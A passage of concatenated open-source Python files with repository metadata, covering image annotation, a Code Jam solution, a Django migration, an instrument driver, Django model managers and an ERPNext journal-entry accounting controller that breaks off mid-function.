rel_pt = tuple([i - 0.5 for i in frac_pt])
rotation = celldata["rotation"]
if random:
rotation = 0
marker_pt = original_image_point(rel_point=rel_pt,
rotation=rotation,
ydim=celldata["ydim"],
xdim=celldata["xdim"],
dy_offset=celldata["dy_offset"],
dx_offset=celldata["dx_offset"])
ann.draw_line(marker_pt, celldata["centroid"], (255, 255, 255))
ann.draw_cross(celldata["centroid"], (255, 255, 255))
with open(output_file, "wb") as fh:
fh.write(ann.png())
def main():
# Parse the command line arguments.
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument("input_dir", help="Input directory (with json files)")
parser.add_argument("input_image", help="Input image")
parser.add_argument("parameters_file", help="Parameters file")
parser.add_argument("output_file", help="Output file")
parser.add_argument("--random", action="store_true", help="Use random rotation")
args = parser.parse_args()
# Check that the input directory and files exists.
if not os.path.isdir(args.input_dir):
parser.error("{} not a directory".format(args.input_dir))
if not os.path.isfile(args.input_image):
parser.error("{} not a file".format(args.input_image))
if not os.path.isfile(args.parameters_file):
parser.error("{} not a file".format(args.parameters_file))
# Read in the parameters.
params = Parameters.from_file(args.parameters_file)
# Don't write out intermediate images.
AutoWrite.on = False
# Setup a logger for the script.
log_fname = "audit.log"
log_fpath = log_fname
logging_level = logging.INFO
logging.basicConfig(filename=log_fpath, level=logging_level)
# Log some basic information about the script that is running.
logging.info("Script name: {}".format(__file__))
logging.info("Script version: {}".format(__version__))
logging.info("Parameters: {}".format(params))
# Run the analysis.
save_annotated_leaf(args.input_dir, args.input_image, args.output_file,
args.random, **params)
if __name__ == "__main__":
main()
|
JIC-Image-Analysis/cells-from-leaves
|
scripts/leaf_annotation.py
|
Python
|
mit
| 4,107
|
# Copyright (c) 2020 kamyu. All rights reserved.
#
# Google Code Jam 2014 Qualification Round - Problem A. Magic Trick
# https://code.google.com/codejam/contest/2974486/dashboard#s=p0
#
# Time: O(1)
# Space: O(1)
#
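# The chosen card must appear in the selected row of both 4x4 arrangements,
# so the answer is the intersection of those two rows: an empty intersection
# means the volunteer cheated, and more than one common card means the
# magician cannot decide.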
def magic_trick():
ANS, ARR = [0]*2, [[] for _ in xrange(2)]
for i in xrange(2):
ANS[i] = input()-1
for _ in xrange(4):
ARR[i].append(raw_input().strip().split())
result = set(ARR[0][ANS[0]]) & set(ARR[1][ANS[1]])
if not result:
return "Volunteer cheated!"
if len(result) > 1:
return "Bad magician!"
return result.pop()
for case in xrange(input()):
print 'Case #%d: %s' % (case+1, magic_trick())
|
kamyu104/GoogleCodeJam-2014
|
Qualification Round/magic_trick.py
|
Python
|
mit
| 686
|
# Generated by Django 2.1.5 on 2019-06-07 13:51
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('validation', '0004_auto_20190607_1314'),
]
operations = [
migrations.AlterField(
model_name='flagged',
name='flg_dataset',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='flagged', to='coadd.Dataset'),
),
]
|
linea-it/dri
|
api/validation/migrations/0005_auto_20190607_1351.py
|
Python
|
gpl-3.0
| 503
|
"""
Python Interchangeable Virtual Instrument Library
Copyright (c) 2013-2016 Alex Forencich
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
from .rigolDP800 import *
class rigolDP832A(rigolDP800):
"Rigol DP832A IVI DC power supply driver"
def __init__(self, *args, **kwargs):
self.__dict__.setdefault('_instrument_id', 'DP832A')
super(rigolDP832A, self).__init__(*args, **kwargs)
self._output_count = 3
self._output_spec = [
{
'range': {
'P30V': (30.0, 3.0)
},
'ovp_max': 33.0,
'ocp_max': 3.3,
'voltage_max': 30.0,
'current_max': 3.0
},
{
'range': {
'P30V': (30.0, 3.0)
},
'ovp_max': 33.0,
'ocp_max': 3.3,
'voltage_max': 30.0,
'current_max': 3.0
},
{
'range': {
'P5V': (5.0, 3.0)
},
'ovp_max': 5.5,
'ocp_max': 3.3,
'voltage_max': 5.0,
'current_max': 3.0
}
]
self._init_outputs()
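# Illustrative usage sketch (the resource string is a placeholder, and the
# attribute names follow the generic IVI DCPwr interface this driver builds
# on -- an assumption, not something defined in this file):
#
#     import ivi
#     psu = ivi.rigol.rigolDP832A("TCPIP0::192.168.1.100::INSTR")
#     psu.outputs[0].voltage_level = 12.0
#     psu.outputs[0].current_limit = 1.0
#     psu.outputs[0].enabled = True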
|
Diti24/python-ivi
|
ivi/rigol/rigolDP832A.py
|
Python
|
mit
| 2,291
|
from django.db import models
from django.contrib.auth.models import User
import time
class ArtistManager(models.Manager):
def validate(self):
"""
        Mark artists currently flagged is_valid=False as valid.
"""
qs = self.get_query_set().filter(is_valid=False)
if qs.update(is_valid=True):
return True
def invalid_artists(self):
"""
Return artists that are marked is_valid = False
"""
return self.get_query_set().filter(is_valid=False)
def dmca_artists(self):
"""
Return artists that are marked dmca.
"""
return self.get_query_set().filter(is_dmca=True)
def valid_artists(self):
"""
Return artists that are marked is_valid = True
"""
return self.get_query_set().filter(is_valid=True)
    def no_albums(self):
        """
        Return valid artists with no albums.
        """
        return (artist for artist in self.valid_artists() if not artist.albums.exists())
    def has_albums(self):
        """
        Return valid artists with albums.
        """
        return (artist for artist in self.valid_artists() if artist.albums.exists())
def no_tags(self):
"""
Return valid artists with no tags.
"""
no_tags = []
artists = self.valid_artists()
for artist in artists:
if not artist.tags.all(): no_tags.append(artist)
return no_tags
class AlbumManager(models.Manager):
def invalid_albums(self):
"""
Return albums that are marked is_valid = False
"""
return self.get_query_set().filter(is_valid=False)
def valid_albums(self):
"""
Return albums that are marked is_valid = True
"""
return self.get_query_set().filter(is_valid=True)
def latest_with_links(self):
"""
Return latest albums with links.
"""
latest = []
albums = self.valid_albums().order_by('-created').filter()
for album in albums:
if album.link_set.all():
latest.append(album)
return latest[:10]
def popular_uploaders(self, number=10):
"""
Returns a list of 10 of the most popular album uploaders.
"""
d = {}
albums = self.get_query_set().all()
for album in albums:
if album.user:
d[album.user.username] = album.user.album_set.count()
if number == 0:
return [album for album in reversed(sorted(d.items(), key=lambda (k,v): (v,k)))]
return [album for album in reversed(sorted(d.items(), key=lambda (k,v): (v,k)))][:number]
class LinkManager(models.Manager):
def reported_links(self, number=None):
"""
Returns all reported links, by default it returns all which have been reported at least once.
If "number" is provided, it returns links reported = number.
"""
if number:
return self.get_query_set().filter(reported__exact=number)
return self.get_query_set().filter(reported__gte=1)
def popular_uploaders(self, number=10):
"""
Returns a list of 10 of the most popular link uploaders.
"""
d = {}
for link in self.get_query_set():
if d.has_key(link.user.username):
d[link.user.username] = d[link.user.username]+1
else:
d[link.user.username] = 1
if number == 0:
return [link for link in sorted(d.items(), key=lambda (k,v): (v,k))]
return [link for link in sorted(d.items(), key=lambda (k,v): (v,k))]#[:number]
|
tsoporan/tehorng
|
submissions/managers.py
|
Python
|
agpl-3.0
| 3,158
|
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
from frappe.utils import cstr, flt, fmt_money, formatdate
from frappe import msgprint, _, scrub
from erpnext.controllers.accounts_controller import AccountsController
from erpnext.accounts.utils import get_balance_on, get_account_currency
from erpnext.accounts.party import get_party_account_currency
from erpnext.setup.utils import get_company_currency
class JournalEntry(AccountsController):
def __init__(self, arg1, arg2=None):
super(JournalEntry, self).__init__(arg1, arg2)
def get_feed(self):
return self.voucher_type
def validate(self):
if not self.is_opening:
self.is_opening='No'
self.clearance_date = None
super(JournalEntry, self).validate_date_with_fiscal_year()
self.validate_party()
self.validate_cheque_info()
self.validate_entries_for_advance()
self.validate_multi_currency()
self.validate_debit_and_credit()
self.validate_against_jv()
self.validate_reference_doc()
self.set_against_account()
self.create_remarks()
self.set_print_format_fields()
self.validate_expense_claim()
self.validate_credit_debit_note()
self.validate_empty_accounts_table()
self.set_account_and_party_balance()
self.set_title()
def on_submit(self):
self.check_credit_limit()
self.make_gl_entries()
self.update_advance_paid()
self.update_expense_claim()
def set_title(self):
self.title = self.pay_to_recd_from or self.accounts[0].account
def update_advance_paid(self):
advance_paid = frappe._dict()
for d in self.get("accounts"):
if d.is_advance:
if d.reference_type in ("Sales Order", "Purchase Order"):
advance_paid.setdefault(d.reference_type, []).append(d.reference_name)
for voucher_type, order_list in advance_paid.items():
for voucher_no in list(set(order_list)):
frappe.get_doc(voucher_type, voucher_no).set_total_advance_paid()
def on_cancel(self):
from erpnext.accounts.utils import remove_against_link_from_jv
remove_against_link_from_jv(self.doctype, self.name)
self.make_gl_entries(1)
self.update_advance_paid()
self.update_expense_claim()
def validate_party(self):
for d in self.get("accounts"):
account_type = frappe.db.get_value("Account", d.account, "account_type")
if account_type in ["Receivable", "Payable"]:
if not (d.party_type and d.party):
frappe.throw(_("Row {0}: Party Type and Party is required for Receivable / Payable account {1}").format(d.idx, d.account))
elif d.party_type and d.party:
frappe.throw(_("Row {0}: Party Type and Party is only applicable against Receivable / Payable account").format(d.idx))
def check_credit_limit(self):
customers = list(set([d.party for d in self.get("accounts")
if d.party_type=="Customer" and d.party and flt(d.debit) > 0]))
if customers:
from erpnext.selling.doctype.customer.customer import check_credit_limit
for customer in customers:
check_credit_limit(customer, self.company)
def validate_cheque_info(self):
if self.voucher_type in ['Bank Entry']:
if not self.cheque_no or not self.cheque_date:
msgprint(_("Reference No & Reference Date is required for {0}").format(self.voucher_type),
raise_exception=1)
if self.cheque_date and not self.cheque_no:
msgprint(_("Reference No is mandatory if you entered Reference Date"), raise_exception=1)
def validate_entries_for_advance(self):
for d in self.get('accounts'):
if d.reference_type not in ("Sales Invoice", "Purchase Invoice", "Journal Entry"):
if (d.party_type == 'Customer' and flt(d.credit) > 0) or \
(d.party_type == 'Supplier' and flt(d.debit) > 0):
if d.is_advance=="No":
msgprint(_("Row {0}: Please check 'Is Advance' against Account {1} if this is an advance entry.").format(d.idx, d.account))
elif d.reference_type in ("Sales Order", "Purchase Order") and d.is_advance != "Yes":
frappe.throw(_("Row {0}: Payment against Sales/Purchase Order should always be marked as advance").format(d.idx))
def validate_against_jv(self):
for d in self.get('accounts'):
if d.reference_type=="Journal Entry":
account_root_type = frappe.db.get_value("Account", d.account, "root_type")
if account_root_type == "Asset" and flt(d.debit) > 0:
frappe.throw(_("For {0}, only credit accounts can be linked against another debit entry")
.format(d.account))
elif account_root_type == "Liability" and flt(d.credit) > 0:
frappe.throw(_("For {0}, only debit accounts can be linked against another credit entry")
.format(d.account))
if d.reference_name == self.name:
frappe.throw(_("You can not enter current voucher in 'Against Journal Entry' column"))
against_entries = frappe.db.sql("""select * from `tabJournal Entry Account`
where account = %s and docstatus = 1 and parent = %s
and ifnull(reference_type, '') in ("", "Sales Order", "Purchase Order")
""", (d.account, d.reference_name), as_dict=True)
if not against_entries:
frappe.throw(_("Journal Entry {0} does not have account {1} or already matched against other voucher")
.format(d.reference_name, d.account))
else:
dr_or_cr = "debit" if d.credit > 0 else "credit"
valid = False
for jvd in against_entries:
if flt(jvd[dr_or_cr]) > 0:
valid = True
if not valid:
frappe.throw(_("Against Journal Entry {0} does not have any unmatched {1} entry")
.format(d.reference_name, dr_or_cr))
def validate_reference_doc(self):
"""Validates reference document"""
field_dict = {
'Sales Invoice': ["Customer", "Debit To"],
'Purchase Invoice': ["Supplier", "Credit To"],
'Sales Order': ["Customer"],
'Purchase Order': ["Supplier"]
}
self.reference_totals = {}
self.reference_types = {}
self.reference_accounts = {}
for d in self.get("accounts"):
if not d.reference_type:
d.reference_name = None
if not d.reference_name:
d.reference_type = None
if d.reference_type and d.reference_name and (d.reference_type in field_dict.keys()):
dr_or_cr = "credit_in_account_currency" \
if d.reference_type in ("Sales Order", "Sales Invoice") else "debit_in_account_currency"
# check debit or credit type Sales / Purchase Order
if d.reference_type=="Sales Order" and flt(d.debit) > 0:
frappe.throw(_("Row {0}: Debit entry can not be linked with a {1}").format(d.idx, d.reference_type))
if d.reference_type == "Purchase Order" and flt(d.credit) > 0:
frappe.throw(_("Row {0}: Credit entry can not be linked with a {1}").format(d.idx, d.reference_type))
# set totals
if not d.reference_name in self.reference_totals:
self.reference_totals[d.reference_name] = 0.0
self.reference_totals[d.reference_name] += flt(d.get(dr_or_cr))
self.reference_types[d.reference_name] = d.reference_type
self.reference_accounts[d.reference_name] = d.account
against_voucher = frappe.db.get_value(d.reference_type, d.reference_name,
[scrub(dt) for dt in field_dict.get(d.reference_type)])
# check if party and account match
if d.reference_type in ("Sales Invoice", "Purchase Invoice"):
if (against_voucher[0] != d.party or against_voucher[1] != d.account):
frappe.throw(_("Row {0}: Party / Account does not match with {1} / {2} in {3} {4}")
.format(d.idx, field_dict.get(d.reference_type)[0], field_dict.get(d.reference_type)[1],
d.reference_type, d.reference_name))
# check if party matches for Sales / Purchase Order
if d.reference_type in ("Sales Order", "Purchase Order"):
# set totals
if against_voucher != d.party:
frappe.throw(_("Row {0}: {1} {2} does not match with {3}") \
.format(d.idx, d.party_type, d.party, d.reference_type))
self.validate_orders()
self.validate_invoices()
def validate_orders(self):
"""Validate totals, stopped and docstatus for orders"""
for reference_name, total in self.reference_totals.iteritems():
reference_type = self.reference_types[reference_name]
account = self.reference_accounts[reference_name]
if reference_type in ("Sales Order", "Purchase Order"):
order = frappe.db.get_value(reference_type, reference_name,
["docstatus", "per_billed", "status", "advance_paid",
"base_grand_total", "grand_total", "currency"], as_dict=1)
if order.docstatus != 1:
frappe.throw(_("{0} {1} is not submitted").format(reference_type, reference_name))
if flt(order.per_billed) >= 100:
frappe.throw(_("{0} {1} is fully billed").format(reference_type, reference_name))
if cstr(order.status) == "Stopped":
frappe.throw(_("{0} {1} is stopped").format(reference_type, reference_name))
account_currency = get_account_currency(account)
if account_currency == self.company_currency:
voucher_total = order.base_grand_total
else:
voucher_total = order.grand_total
if flt(voucher_total) < (flt(order.advance_paid) + total):
frappe.throw(_("Advance paid against {0} {1} cannot be greater \
than Grand Total {2}").format(reference_type, reference_name, voucher_total))
def validate_invoices(self):
"""Validate totals and docstatus for invoices"""
for reference_name, total in self.reference_totals.iteritems():
reference_type = self.reference_types[reference_name]
if reference_type in ("Sales Invoice", "Purchase Invoice"):
invoice = frappe.db.get_value(reference_type, reference_name,
["docstatus", "outstanding_amount"], as_dict=1)
if invoice.docstatus != 1:
frappe.throw(_("{0} {1} is not submitted").format(reference_type, reference_name))
if total and flt(invoice.outstanding_amount) < total:
frappe.throw(_("Payment against {0} {1} cannot be greater than Outstanding Amount {2}")
.format(reference_type, reference_name, invoice.outstanding_amount))
def set_against_account(self):
accounts_debited, accounts_credited = [], []
for d in self.get("accounts"):
if flt(d.debit > 0): accounts_debited.append(d.party or d.account)
if flt(d.credit) > 0: accounts_credited.append(d.party or d.account)
for d in self.get("accounts"):
if flt(d.debit > 0): d.against_account = ", ".join(list(set(accounts_credited)))
if flt(d.credit > 0): d.against_account = ", ".join(list(set(accounts_debited)))
def validate_debit_and_credit(self):
self.total_debit, self.total_credit, self.difference = 0, 0, 0
for d in self.get("accounts"):
if d.debit and d.credit:
frappe.throw(_("You cannot credit and debit same account at the same time"))
self.total_debit = flt(self.total_debit) + flt(d.debit, d.precision("debit"))
self.total_credit = flt(self.total_credit) + flt(d.credit, d.precision("credit"))
self.difference = flt(self.total_debit, self.precision("total_debit")) - \
flt(self.total_credit, self.precision("total_credit"))
if self.difference:
frappe.throw(_("Total Debit must be equal to Total Credit. The difference is {0}")
.format(self.difference))
def validate_multi_currency(self):
alternate_currency = []
for d in self.get("accounts"):
account = frappe.db.get_value("Account", d.account, ["account_currency", "account_type"], as_dict=1)
d.account_currency = account.account_currency or self.company_currency
d.account_type = account.account_type
if d.account_currency!=self.company_currency and d.account_currency not in alternate_currency:
alternate_currency.append(d.account_currency)
if alternate_currency:
if not self.multi_currency:
frappe.throw(_("Please check Multi Currency option to allow accounts with other currency"))
if len(alternate_currency) > 1:
frappe.throw(_("Only one alternate currency can be used in a single Journal Entry"))
self.set_exchange_rate()
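		# Each row's amounts are entered in that account's currency; convert
		# them to company currency using the row's exchange rate.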
for d in self.get("accounts"):
d.debit = flt(flt(d.debit_in_account_currency)*flt(d.exchange_rate), d.precision("debit"))
d.credit = flt(flt(d.credit_in_account_currency)*flt(d.exchange_rate), d.precision("credit"))
def set_exchange_rate(self):
for d in self.get("accounts"):
if d.account_currency == self.company_currency:
d.exchange_rate = 1
elif not d.exchange_rate or d.account_type=="Bank" or \
(d.reference_type in ("Sales Invoice", "Purchase Invoice") and d.reference_name):
d.exchange_rate = get_exchange_rate(d.account, d.account_currency, self.company,
d.reference_type, d.reference_name, d.debit, d.credit, d.exchange_rate)
if not d.exchange_rate:
frappe.throw(_("Row {0}: Exchange Rate is mandatory").format(d.idx))
def create_remarks(self):
r = []
if self.cheque_no:
if self.cheque_date:
r.append(_('Reference #{0} dated {1}').format(self.cheque_no, formatdate(self.cheque_date)))
else:
msgprint(_("Please enter Reference date"), raise_exception=frappe.MandatoryError)
for d in self.get('accounts'):
if d.reference_type=="Sales Invoice" and d.credit:
r.append(_("{0} against Sales Invoice {1}").format(fmt_money(flt(d.credit), currency = self.company_currency), \
d.reference_name))
if d.reference_type=="Sales Order" and d.credit:
r.append(_("{0} against Sales Order {1}").format(fmt_money(flt(d.credit), currency = self.company_currency), \
d.reference_name))
if d.reference_type == "Purchase Invoice" and d.debit:
bill_no = frappe.db.sql("""select bill_no, bill_date
from `tabPurchase Invoice` where name=%s""", d.reference_name)
if bill_no and bill_no[0][0] and bill_no[0][0].lower().strip() \
not in ['na', 'not applicable', 'none']:
r.append(_('{0} against Bill {1} dated {2}').format(fmt_money(flt(d.debit), currency=self.company_currency), bill_no[0][0],
bill_no[0][1] and formatdate(bill_no[0][1].strftime('%Y-%m-%d'))))
if d.reference_type == "Purchase Order" and d.debit:
r.append(_("{0} against Purchase Order {1}").format(fmt_money(flt(d.credit), currency = self.company_currency), \
d.reference_name))
if self.user_remark:
r.append(_("Note: {0}").format(self.user_remark))
if r:
self.remark = ("\n").join(r) #User Remarks is not mandatory
def set_print_format_fields(self):
for d in self.get('accounts'):
if d.party_type and d.party:
if not self.pay_to_recd_from:
self.pay_to_recd_from = frappe.db.get_value(d.party_type, d.party,
"customer_name" if d.party_type=="Customer" else "supplier_name")
self.set_total_amount(d.debit or d.credit)
elif frappe.db.get_value("Account", d.account, "account_type") in ["Bank", "Cash"]:
self.set_total_amount(d.debit or d.credit)
def set_total_amount(self, amt):
self.total_amount = amt
from frappe.utils import money_in_words
self.total_amount_in_words = money_in_words(amt, self.company_currency)
def make_gl_entries(self, cancel=0, adv_adj=0):
from erpnext.accounts.general_ledger import make_gl_entries
gl_map = []
for d in self.get("accounts"):
if d.debit or d.credit:
gl_map.append(
self.get_gl_dict({
"account": d.account,
"party_type": d.party_type,
"party": d.party,
"against": d.against_account,
"debit": flt(d.debit, d.precision("debit")),
"credit": flt(d.credit, d.precision("credit")),
"account_currency": d.account_currency,
"debit_in_account_currency": flt(d.debit_in_account_currency, d.precision("debit_in_account_currency")),
"credit_in_account_currency": flt(d.credit_in_account_currency, d.precision("credit_in_account_currency")),
"against_voucher_type": d.reference_type,
"against_voucher": d.reference_name,
"remarks": self.remark,
"cost_center": d.cost_center
})
)
if gl_map:
make_gl_entries(gl_map, cancel=cancel, adv_adj=adv_adj)
def get_balance(self):
if not self.get('accounts'):
msgprint(_("'Entries' cannot be empty"), raise_exception=True)
else:
flag, self.total_debit, self.total_credit = 0, 0, 0
diff = flt(self.difference, self.precision("difference"))
# If any row without amount, set the diff on that row
if diff:
blank_row = None
for d in self.get('accounts'):
if not d.credit_in_account_currency and not d.debit_in_account_currency and diff != 0:
blank_row = d
if not blank_row:
blank_row = self.append('accounts', {})
blank_row.exchange_rate = 1
if diff>0:
blank_row.credit_in_account_currency = diff
blank_row.credit = diff
elif diff<0:
blank_row.debit_in_account_currency = abs(diff)
blank_row.debit = abs(diff)
self.validate_debit_and_credit()
def get_outstanding_invoices(self):
self.set('accounts', [])
total = 0
for d in self.get_values():
total += flt(d.outstanding_amount, self.precision("credit", "accounts"))
jd1 = self.append('accounts', {})
jd1.account = d.account
jd1.party = d.party
if self.write_off_based_on == 'Accounts Receivable':
jd1.party_type = "Customer"
jd1.credit = flt(d.outstanding_amount, self.precision("credit", "accounts"))
jd1.reference_type = "Sales Invoice"
jd1.reference_name = cstr(d.name)
elif self.write_off_based_on == 'Accounts Payable':
jd1.party_type = "Supplier"
jd1.debit = flt(d.outstanding_amount, self.precision("debit", "accounts"))
jd1.reference_type = "Purchase Invoice"
jd1.reference_name = cstr(d.name)
jd2 = self.append('accounts', {})
if self.write_off_based_on == 'Accounts Receivable':
jd2.debit = total
elif self.write_off_based_on == 'Accounts Payable':
jd2.credit = total
self.validate_debit_and_credit()
def get_values(self):
cond = " and outstanding_amount <= {0}".format(self.write_off_amount) \
if flt(self.write_off_amount) > 0 else ""
if self.write_off_based_on == 'Accounts Receivable':
return frappe.db.sql("""select name, debit_to as account, customer as party, outstanding_amount
from `tabSales Invoice` where docstatus = 1 and company = %s
and outstanding_amount > 0 %s""" % ('%s', cond), self.company, as_dict=True)
elif self.write_off_based_on == 'Accounts Payable':
return frappe.db.sql("""select name, credit_to as account, supplier as party, outstanding_amount
from `tabPurchase Invoice` where docstatus = 1 and company = %s
and outstanding_amount > 0 %s""" % ('%s', cond), self.company, as_dict=True)
def update_expense_claim(self):
for d in self.accounts:
if d.reference_type=="Expense Claim":
amt = frappe.db.sql("""select sum(debit) as amt from `tabJournal Entry Account`
where reference_type = "Expense Claim" and
reference_name = %s and docstatus = 1""", d.reference_name ,as_dict=1)[0].amt
frappe.db.set_value("Expense Claim", d.reference_name , "total_amount_reimbursed", amt)
def validate_expense_claim(self):
for d in self.accounts:
if d.reference_type=="Expense Claim":
sanctioned_amount, reimbursed_amount = frappe.db.get_value("Expense Claim",
d.reference_name, ("total_sanctioned_amount", "total_amount_reimbursed"))
pending_amount = flt(sanctioned_amount) - flt(reimbursed_amount)
if d.debit > pending_amount:
frappe.throw(_("Row No {0}: Amount cannot be greater than Pending Amount against Expense Claim {1}. Pending Amount is {2}".format(d.idx, d.reference_name, pending_amount)))
def validate_credit_debit_note(self):
if self.stock_entry:
if frappe.db.get_value("Stock Entry", self.stock_entry, "docstatus") != 1:
frappe.throw(_("Stock Entry {0} is not submitted").format(self.stock_entry))
if frappe.db.exists({"doctype": "Journal Entry", "stock_entry": self.stock_entry, "docstatus":1}):
frappe.msgprint(_("Warning: Another {0} # {1} exists against stock entry {2}".format(self.voucher_type, self.name, self.stock_entry)))
def validate_empty_accounts_table(self):
if not self.get('accounts'):
frappe.throw("Accounts table cannot be blank.")
def set_account_and_party_balance(self):
account_balance = {}
party_balance = {}
for d in self.get("accounts"):
if d.account not in account_balance:
account_balance[d.account] = get_balance_on(account=d.account, date=self.posting_date)
if (d.party_type, d.party) not in party_balance:
party_balance[(d.party_type, d.party)] = get_balance_on(party_type=d.party_type,
party=d.party, date=self.posting_date)
d.account_balance = account_balance[d.account]
d.party_balance = party_balance[(d.party_type, d.party)]
@frappe.whitelist()
def get_default_bank_cash_account(company, voucher_type, mode_of_payment=None):
from erpnext.accounts.doctype.sales_invoice.sales_invoice import get_bank_cash_account
if mode_of_payment:
account = get_bank_cash_account(mode_of_payment, company)
if account.get("account"):
account.update({"balance": get_balance_on(account.get("account"))})
return account
if voucher_type=="Bank Entry":
account = frappe.db.get_value("Company", company, "default_bank_account")
if not account:
account = frappe.db.get_value("Account", {"company": company, "account_type": "Bank", "is_group": 0})
elif voucher_type=="Cash Entry":
account = frappe.db.get_value("Company", company, "default_cash_account")
if not account:
account = frappe.db.get_value("Account", {"company": company, "account_type": "Cash", "is_group": 0})
if account:
account_details = frappe.db.get_value("Account", account, ["account_currency", "account_type"], as_dict=1)
return {
"account": account,
"balance": get_balance_on(account),
"account_currency": account_details.account_currency,
"account_type": account_details.account_type
}
@frappe.whitelist()
def get_payment_entry_from_sales_invoice(sales_invoice):
"""Returns new Journal Entry document as dict for given Sales Invoice"""
from erpnext.accounts.utils import get_balance_on
si = frappe.get_doc("Sales Invoice", sales_invoice)
# exchange rate
exchange_rate = get_exchange_rate(si.debit_to, si.party_account_currency, si.company,
si.doctype, si.name)
jv = get_payment_entry(si)
jv.remark = 'Payment received against Sales Invoice {0}. {1}'.format(si.name, si.remarks)
# credit customer
row1 = jv.get("accounts")[0]
row1.account = si.debit_to
row1.account_currency = si.party_account_currency
row1.party_type = "Customer"
row1.party = si.customer
row1.balance = get_balance_on(si.debit_to)
row1.party_balance = get_balance_on(party=si.customer, party_type="Customer")
row1.credit_in_account_currency = si.outstanding_amount
row1.reference_type = si.doctype
row1.reference_name = si.name
row1.exchange_rate = exchange_rate
row1.account_type = "Receivable" if si.customer else ""
# debit bank
row2 = jv.get("accounts")[1]
if row2.account_currency == si.party_account_currency:
row2.debit_in_account_currency = si.outstanding_amount
else:
row2.debit_in_account_currency = si.outstanding_amount * exchange_rate
# set multi currency check
if row1.account_currency != si.company_currency or row2.account_currency != si.company_currency:
jv.multi_currency = 1
return jv.as_dict()
@frappe.whitelist()
def get_payment_entry_from_purchase_invoice(purchase_invoice):
"""Returns new Journal Entry document as dict for given Purchase Invoice"""
pi = frappe.get_doc("Purchase Invoice", purchase_invoice)
exchange_rate = get_exchange_rate(pi.credit_to, pi.party_account_currency, pi.company,
pi.doctype, pi.name)
jv = get_payment_entry(pi)
jv.remark = 'Payment against Purchase Invoice {0}. {1}'.format(pi.name, pi.remarks)
jv.exchange_rate = exchange_rate
# debit supplier
row1 = jv.get("accounts")[0]
row1.account = pi.credit_to
row1.account_currency = pi.party_account_currency
row1.party_type = "Supplier"
row1.party = pi.supplier
row1.balance = get_balance_on(pi.credit_to)
row1.party_balance = get_balance_on(party=pi.supplier, party_type="Supplier")
row1.debit_in_account_currency = pi.outstanding_amount
row1.reference_type = pi.doctype
row1.reference_name = pi.name
row1.exchange_rate = exchange_rate
row1.account_type = "Payable" if pi.supplier else ""
# credit bank
row2 = jv.get("accounts")[1]
if row2.account_currency == pi.party_account_currency:
row2.credit_in_account_currency = pi.outstanding_amount
else:
row2.credit_in_account_currency = pi.outstanding_amount * exchange_rate
# set multi currency check
if row1.account_currency != pi.company_currency or row2.account_currency != pi.company_currency:
jv.multi_currency = 1
return jv.as_dict()
@frappe.whitelist()
def get_payment_entry_from_sales_order(sales_order):
"""Returns new Journal Entry document as dict for given Sales Order"""
from erpnext.accounts.utils import get_balance_on
from erpnext.accounts.party import get_party_account
so = frappe.get_doc("Sales Order", sales_order)
if flt(so.per_billed, 2) != 0.0:
frappe.throw(_("Can only make payment against unbilled Sales Order"))
jv = get_payment_entry(so)
jv.remark = 'Advance payment received against Sales Order {0}.'.format(so.name)
party_account = get_party_account("Customer", so.customer, so.company)
party_account_currency = get_account_currency(party_account)
exchange_rate = get_exchange_rate(party_account, party_account_currency, so.company)
if party_account_currency == so.company_currency:
amount = flt(so.base_grand_total) - flt(so.advance_paid)
else:
amount = flt(so.grand_total) - flt(so.advance_paid)
# credit customer
row1 = jv.get("accounts")[0]
row1.account = party_account
row1.account_currency = party_account_currency
row1.party_type = "Customer"
row1.party = so.customer
row1.balance = get_balance_on(party_account)
row1.party_balance = get_balance_on(party=so.customer, party_type="Customer")
row1.credit_in_account_currency = amount
row1.reference_type = so.doctype
row1.reference_name = so.name
row1.is_advance = "Yes"
row1.exchange_rate = exchange_rate
row1.account_type = "Receivable"
# debit bank
row2 = jv.get("accounts")[1]
if row2.account_currency == party_account_currency:
row2.debit_in_account_currency = amount
else:
row2.debit_in_account_currency = amount * exchange_rate
# set multi currency check
if row1.account_currency != so.company_currency or row2.account_currency != so.company_currency:
jv.multi_currency = 1
return jv.as_dict()
@frappe.whitelist()
def get_payment_entry_from_purchase_order(purchase_order):
"""Returns new Journal Entry document as dict for given Sales Order"""
from erpnext.accounts.utils import get_balance_on
from erpnext.accounts.party import get_party_account
po = frappe.get_doc("Purchase Order", purchase_order)
if flt(po.per_billed, 2) != 0.0:
frappe.throw(_("Can only make payment against unbilled Sales Order"))
jv = get_payment_entry(po)
jv.remark = 'Advance payment made against Purchase Order {0}.'.format(po.name)
party_account = get_party_account("Supplier", po.supplier, po.company)
party_account_currency = get_account_currency(party_account)
exchange_rate = get_exchange_rate(party_account, party_account_currency, po.company)
if party_account_currency == po.company_currency:
amount = flt(po.base_grand_total) - flt(po.advance_paid)
else:
amount = flt(po.grand_total) - flt(po.advance_paid)
# debit supplier
row1 = jv.get("accounts")[0]
row1.account = party_account
row1.party_type = "Supplier"
row1.party = po.supplier
row1.balance = get_balance_on(party_account)
row1.party_balance = get_balance_on(party=po.supplier, party_type="Supplier")
row1.debit_in_account_currency = amount
row1.reference_type = po.doctype
row1.reference_name = po.name
row1.is_advance = "Yes"
row1.exchange_rate = exchange_rate
row1.account_type = "Payable"
# credit bank
row2 = jv.get("accounts")[1]
if row2.account_currency == party_account_currency:
